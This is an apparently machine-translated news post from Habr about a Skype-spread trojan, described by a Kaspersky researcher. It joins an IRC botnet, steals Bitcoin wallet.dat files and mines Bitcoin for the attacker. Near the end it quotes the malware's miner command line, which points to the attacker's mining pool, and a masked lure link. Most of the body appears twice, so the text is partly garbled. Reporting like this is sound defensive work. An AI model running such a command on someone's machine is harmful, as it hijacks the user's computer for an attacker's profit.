The new skype-trojan turns a computer into a slave who mines Bitcoin
In a blog of Dmitry Bestuzhev, an expert at Kaspersky Lab, a few days ago there was a message about a mastered company for distributing a new Trojan on Skype. Users are sent messages offering to follow a certain link of the form:
As of April 4, the intensity of the transition through it was almost 3 clicks per second, and the total number of clicks was about 170k!
Most of the victims are from Russia and Ukraine:
Users from China, Italy, Bulgaria and Taiwan are also affected.
The Trojan itself is written in Visual Basic and is also able to spread via USB-drives. After infection, the victim's computer becomes part of the botnet, using the IRC protocol to communicate with the command server.
In addition, the Trojan seems to be stealing the wallet.dat file from the Bitcoin wallet:
')
In his next post , Dmitry spoke about a similar company, but spreading a bit of a different kind of Trojan. Once on the user's machine, he runs the command:
Thus, forcing your computer to extract bitcoins for the attacker!
At the same time, the load on the CPU increases significantly:
One of the habrayusers wrote about a Trojan with similar functionality 2 years ago, but now, it seems, the Internet is overwhelming with a new wave of malicious software, one way or another connected with Bitcoin, around which lately there has been a lot of noise .
www.goo.gl/XXXXX?image=IMG0540250-JPG
As of April 4, the intensity of the transition through it was almost 3 clicks per second, and the total number of clicks was about 170k!
Most of the victims are from Russia and Ukraine:
Users from China, Italy, Bulgaria and Taiwan are also affected.
The Trojan itself is written in Visual Basic and is also able to spread via USB-drives. After infection, the victim's computer becomes part of the botnet, using the IRC protocol to communicate with the command server.
In addition, the Trojan seems to be stealing the wallet.dat file from the Bitcoin wallet:
')
In his next post , Dmitry spoke about a similar company, but spreading a bit of a different kind of Trojan. Once on the user's machine, he runs the command:
bitcoin-miner.exe -a 60 -l no -o suppp.cantvenlinea.biz:1942/ -u XXXXXX0000001@gmail.com -p XXXXXXXXThus, forcing your computer to extract bitcoins for the attacker!
At the same time, the load on the CPU increases significantly:
One of the habrayusers wrote about a Trojan with similar functionality 2 years ago, but now, it seems, the Internet is overwhelming with a new wave of malicious software, one way or another connected with Bitcoin, around which lately there has been a lot of noise .
Source: https://habr.com/ru/post/175737/
All Articles